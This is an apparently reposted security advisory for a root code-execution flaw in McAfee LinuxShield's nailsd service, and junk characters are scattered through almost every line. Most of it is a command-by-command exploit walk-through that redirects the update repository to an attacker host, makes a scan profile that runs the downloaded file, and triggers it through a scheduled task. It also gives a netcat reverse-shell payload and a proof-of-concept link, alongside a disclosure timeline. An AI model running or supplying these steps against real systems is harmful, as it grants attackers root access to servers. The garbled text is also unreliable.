    , m  H: Q7 p4 ~Orchestrator.% }3 p3 g! r( b" O6 b- Q: \+ T

    + D1 B4 p) `" u, i3 Z' U(Product description from LinuxShield Product Guide)# L* D$ x: J5 @

    4 K( i* y3 K# r" b! A2 P3 O1 `0 ?' n& o/ v) d2 }
    3 \! W, o! g% r4 p% e9 }
    Description:/ t. ~/ o; E8 @% o) }& Q0 k5 |
    ============3 ^  Q" B+ J- p8 \, f0 g
    ( V, M- _" M) M+ R2 F: r! V4 x
    This vulnerability allows remote attackers to execute arbitrary code( `7 Z1 F* A4 v/ S9 o8 E
    on vulnerable installations of McAfee LinuxShield. User interaction/ O& e/ ^4 V  u- \& j
    is not required to exploit this vulnerability but an attacker must4 `$ ~9 V9 ~/ n' N% A( p/ v
    be authenticated.5 _* H: E9 V) j4 p6 }+ F# T

    9 M" I- L: r; |9 vThe LinuxShield Webinterface communicates with the localy installed
      g+ L& W9 a% h+ U"nailsd" daemon, which listens on port 65443/tcp, to do
    * [6 u5 c$ `$ {& `* [& j1 j6 oconfiguration
    + m+ s  x( `1 C/ R! bchanges, query the configuration and execute tasks.& J9 e2 O) P1 ^" m* a

    & F0 x- h- l- G; WEach user, which can login to the victim box, can also authenticate1 P0 j/ z$ x$ }+ I
    it self to the "nailsd" and can do configuration changes and# \+ R1 J5 n$ u  q
    execute
    ( \- R! }# ^( Y+ e' s% Qtasks with root privileges.' }  _' x( p9 Q1 C. g- ]
    2 ^  y0 S$ d  P8 g; m
    A direct execution of commands is not possible, but it is possible to( m* v6 C2 I% _0 E; m9 Q
    download and execute code through manipulation of the config and
    , k, o  Y+ A7 W% }- o$ N5 L, V9 O3 Mexecute schedule tasks of the LinuxShield.
    ( q8 {3 `- n4 ^6 A& E) v& }7 q6 f1 n6 N, t3 m# Q1 W# j

    7 w7 f  `, s. F5 b8 Swalk-through (after the TLS handshake):
    1 n& a8 D8 Y3 X* b3 V+--------------------------------------
    % g" q: A0 ?) A6 }' U0 H9 o/ ]* W1 T" G* F
    nailsd > +OK welcome to the NAILS Statistics Service
    5 N9 q0 u9 ~5 \: @attacker> auth <user> <pass>
    % H" d1 r' G, V0 T+ x8 U# |nailsd > +OK successful authentication% M- O2 o( Z- D+ `) L- L
    , Y8 R& L  L: H) |  D7 Q* x7 Q
    # Set the Attacker repository to download our code from a httpd
    + D. e' ]8 F8 D# (catalog.z)3 a4 Q9 T+ i! H% f9 m% C; }
    #---------------------------------------------------------------, f( G% e, N/ b; P: K5 C& u
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    3 K  b7 d: W* V# Y* A="1.0" encoding="UTF-8"?><ns:SiteLists
    5 M5 O- i! C+ Kxmlns:ns="naSiteLi* W/ \) b4 O+ w- u5 D+ d
    st" GlobalVersion="20030131003110"" I, t/ F4 z" y" U& u. {% z
    LocalVersion="20091209. B* M0 J5 k# o: T+ q
    161903" Type="Client"><SiteList
    6 b- T6 V) {- r+ I; A! y1 KDefault="1" Name="SomeGU4 [& x9 g9 S2 `& J5 W! i' W
    ID"><HttpSite Type="repository"# Z6 n. X7 \7 t) V' B( _
    Name="EvilRepo" Order="1* K0 _; N4 J3 N3 n6 y
    " Server="<attackerhost>:80"( w! v; H; u% m0 G. u, z
    Enabled="1" Local="1"><Rela. V8 b' l( u3 O2 x, x' \
    " f' Z, G6 z+ F( k1 f
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use2 W( I% o. {8 i; t2 s  B
    rName></
    9 d& Z6 C% m+ g+ cUserName><Password* S! j: ]- I* P; q7 S/ j/ X
    Encrypted="0"/></HttpSite></SiteList></) |5 X* P) H9 \+ P* P! C
    ns:SiteLists> _cmd=update
    ; `8 Q( s" A, x  b. M8 M' Z4 Bnailsd > +OK database changes buffered.
    6 c& z, c6 R# r4 D% ^4 `
    # t+ A$ @% D% I% K5 B: z# Execute task to set the attacker repository
    ' Y5 c. f& }, m/ e+ ~3 R0 i#---------------------------------------------------------------
    * `* [% f& G6 qattacker> task setsitelist
    5 r3 U. l8 T( Rnailsd > +OK setting sitelist from CMA.; A; l/ ^2 [% i: C/ m
    6 P4 a# i0 ~5 D% g/ d* H
    # Execute the default Update task to download the code# ^- i$ l, e* I+ ?7 L
    #---------------------------------------------------------------
    9 M: N5 i' m; E, Q2 {' X" tattacker> task nstart LinuxShield Update
    ! s$ F7 s; o5 }  D6 }nailsd > +OK task LinuxShield Update starting+ _5 O1 T8 ?/ N) ^: _
    ( a. }7 Z, t: y0 R
    # Create a Scan profile, which executes our code. The profiles are1 x- T5 t. H) X5 {0 x" Y
    # not stored in the database.
    $ F6 h( [, K, `# E# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg" o% L( [; K9 ~- B8 H
    #---------------------------------------------------------------# ]# K5 E4 G- H
    attacker> sconf ODS_99 begin2 \1 v2 u2 j& Z6 I
    nailsd > +OK 1260400888
    0 }0 k( C, g0 {/ i6 k- j& Z# o9 K; {' Q* u" W4 [
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the! r8 I1 c# e; Q8 k& m
    path8 B( Z+ N8 n0 _$ U
    # where our earlier downloaded catalog.z file is stored.
    ) l: x- [" y5 p  \# e3 u! o# (/opt/McAfee/cma/scratch/update/catalog.z)
    : C; E, f9 f/ W; l- K#---------------------------------------------------------------: L, n( {0 d# e: g7 p5 O
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=3 m. g( _2 D& Z
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O6 Q/ @! l; X* z  m
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    1 U: }5 x# R; r; X10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng8 A4 X  k6 a0 n( `. X, |, W& D. R
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro  `. m9 S) d* l  v' ?) e
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD! D6 ?' s, M2 m' ^) ]/ N+ Y; t
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en% f5 M5 w9 O5 h
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    % E0 p6 v3 \! L" _/ \5 S.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu( i" V3 m; I3 T: ]0 U  Q
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru0 _) k& J( u; |$ |4 o+ }
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    5 P/ q9 `9 v9 h& |% I; }& a.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi6 z7 b+ x: x! ^/ \& g
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    0 N( p5 r6 I7 ~) t1 ndren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    $ b$ Z5 _. J( J9 z8 re nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr' K; E1 J& K( d" W0 z) R8 q; ^! m
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    , c0 P3 b- u4 _$ Ao=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    1 ], y1 U: h+ Y' b7 v.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    1 S! y- s8 w; M1 e3 n0 k/ Erue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat7 E: g5 n+ r2 W& u
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100  I. E2 N7 C3 j6 i4 u+ r& e' Z
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.- B# I) n3 T8 Y
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil7 g, k; X4 J+ m5 R
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true, |" B- o% g- n% V1 h
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    - s/ ~: j2 \. L+ U- }ofile.ODS_99.filter.extensions.type=extension nailsd.profil4 t; S( H. M% d, _) c# W& M
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99" j  Q+ W* i4 k, G( i$ v% ]) A- v
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.; |- I" S$ ~5 `% O, `( T
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    9 T' z* _6 ?6 J" Oecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    - E+ T: f: `. Uss nailsd.profile.ODS_99.action.error=Block; H% v, w7 R( P& c* b' B. [+ B7 r
    nailsd > +OK configuration changes buffered2 V+ h% d: u/ W3 o7 _( x
    attacker> sconf ODS_99 commit 1260400888( B% m' U/ {2 J* }1 f( s. K
    nailsd > +OK configuration changes stored2 n$ f, ~( N0 _: z- m! m5 I
    % i+ t+ e* d! a" `9 f
    # Set a scan task with the manipulated profile to execute the code
    ) S$ m/ F; G; z5 H- w* n#---------------------------------------------------------------
    ! L8 w. X5 ]* r) N3 R) cattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy8 F- a0 h8 M( S& Q, |
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t+ i2 m5 g3 b5 Y* _/ z
    mp;exclude:false timetable=type=unscheduled taskResults=0 i+ {; u% W, Q/ V$ |& F" i
    _lastRun=1260318482 status=Stopped _cmd=insert
    5 F( L) F7 m3 _4 X! Qnailsd > +OK database changes buffered
    $ b7 o2 E! G- Y; w4 }* v8 b. ~! r2 Q) Y5 ?
    # Execute scan task to execute the code
    , A& z* p4 q- Q) y- `7 j4 f8 y0 m#---------------------------------------------------------------
    $ d' Q; {+ W) w' M- R* P2 Eattacker> task nstart Evil Task
    $ W  Y& x/ l( d4 _
    - ?7 p' m7 X8 c. |: q0 q) ~8 [+-------------------------------------- walk-through EOF
    0 B  t4 s$ t4 o  @  }$ j4 K3 H1 f! x' G* x
    ! N7 z8 l5 h& x4 P# C5 T) G
    To get a reverse root shell place something like this in the catalog.z
    . M& k  d6 B9 X$ H! A9 H$ Q, G# m9 b- f% b/ r6 b6 m
    --- snip ---
    * w( D. e; y: ^- {5 B+ M#!/bin/sh
    ) r  Z' G9 K+ lnc -nv <attacker_host> 4444 -e /bin/sh
    0 E7 v: j' Z5 b$ U# c. y7 \--- /snip ---9 q6 \' x- S, |5 d, K

    : Q( \6 s: b# [0 k. E- F/ W# D. n2 p. N8 o+ J" g

    " l2 q+ [- U: L/ z" |8 HProof of Concept :0 F4 R, [( S. |9 \8 r
    ==================
    ; p3 h  A; m: n9 K7 l) Q. F8 N( j/ x3 v* N
    http://inj3ct0r.com/sploits/11165.tar.gz
    4 ]- N4 S0 Y8 ]1 a% s$ F
    ; d& ?, H6 [; e6 W6 {/ l6 {1 J, v4 U; E* B/ u$ m% x% k
    : z* u' ~  L0 D3 o3 X( s
    Solution:. M2 |+ ]; _1 F
    =========
    4 j$ j! a: {) g! y/ c2 y$ a# w# H2 n& Q, m- q4 H9 S' M( C) y, q" }
    McAfee Advisory
    % E3 z' p6 p: T. E$ o/ `. L; T+--------------
    $ y1 W/ Y% ^; mhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007+ T6 A& W2 \& }7 @  L

    9 p5 s, p, G# H; L
    / B4 A) u$ A% v: R' v
    - K$ L3 O+ ]  P4 c  d# iDisclosure Timeline (YYYY/MM/DD):
    # b+ K# T- B9 N9 ?: R/ m/ N=================================
    / u1 m4 m  {6 w- T2 x+ j: V8 h. |/ e3 X: b1 e
    2009.12.07: Vulnerability found6 \/ \2 L6 m+ L+ Z9 k: m7 ~
    2010.02.03: Asked vendor for a PGP key
    1 M. ~! M- d6 P: J1 r/ e2010.02.05: Vendor sent his PGP key1 s' w% P+ t; ^
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    0 [! z0 h8 \$ u( i) H$ N) Wdate (2010.02.18) to Vendor% C3 `9 i8 Q5 C$ N8 q
    2010.02.05: Vendor acknowledges the reception of the advisory5 }2 X3 T) B3 B! [/ i' X  [
    2010.02.16: Ask for a status update, because the planned release date is) H7 F' X5 F( G' n
    2010.02.18.  Y# m. Q0 b  x. \, d6 ?2 s+ n) C8 g
    2010.02.16: Vendor response that, they are currently working on a patch8 ~( u$ H" o5 f% K3 P
    2010.02.17: Changed release date to 2010.02.25.! a# @1 \- ]& z- j3 _% C* Q  ~
    2010.02.22: Vendor gives a status update, that they are able to release
    5 ^0 f( z9 X" B  L7 O" A7 }* Fthe patch on 2010.02.25.5 b! B4 b! u! ?4 x$ A
    2010.02.24: Ask for a list of affected products and the advisory url.
    ' o' U0 h+ j$ w+ y2010.02.24: Vendor sends the list.
    3 d! o& \/ n5 ^% e2010.03.02: Release of this Advisory
    7 l4 k. I" _  {5 Y. X% r3 Z8 X+ h+ w" {# A# Z- e

    " j. t+ R. |4 C3 {9 G) E# K4 h4 H4 p3 ]7 H3 ~) R. t- N
    3 ~0 O8 X) [2 W) y+ Y
    0 z; n1 x( U! M* l

    * y4 |7 z. V# c4 d2 b( K) c
    7 K7 A  o9 K/ |, ~8 s; w0 `1 ?+ t# N* t) G

    2 H$ d- V1 j  J% D3 r" \! I, y0 L# k
    9 M! c, f8 j$ S* Q( }3 w  L8 Q" N& n% p8 W% B+ C

    0 M: m5 ^! J$ b* o5 N; r
    # T. A; Q( m4 \, Q3 z9 J
    : J1 b) }: }. y+ i7 B4 K& C0 ^# F! U
    * W4 U- l- M1 J" ~
    # t* \5 f" B/ o" J- j' f
    : T9 o  d( ^0 n: w6 V9 U+ V0 E  g2 j! ~" O

    - B, T2 K' X( t$ }2 D7 T2 o+ I/ \7 Q, E  k
    5 N7 v, Y' ]: T$ F6 }
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表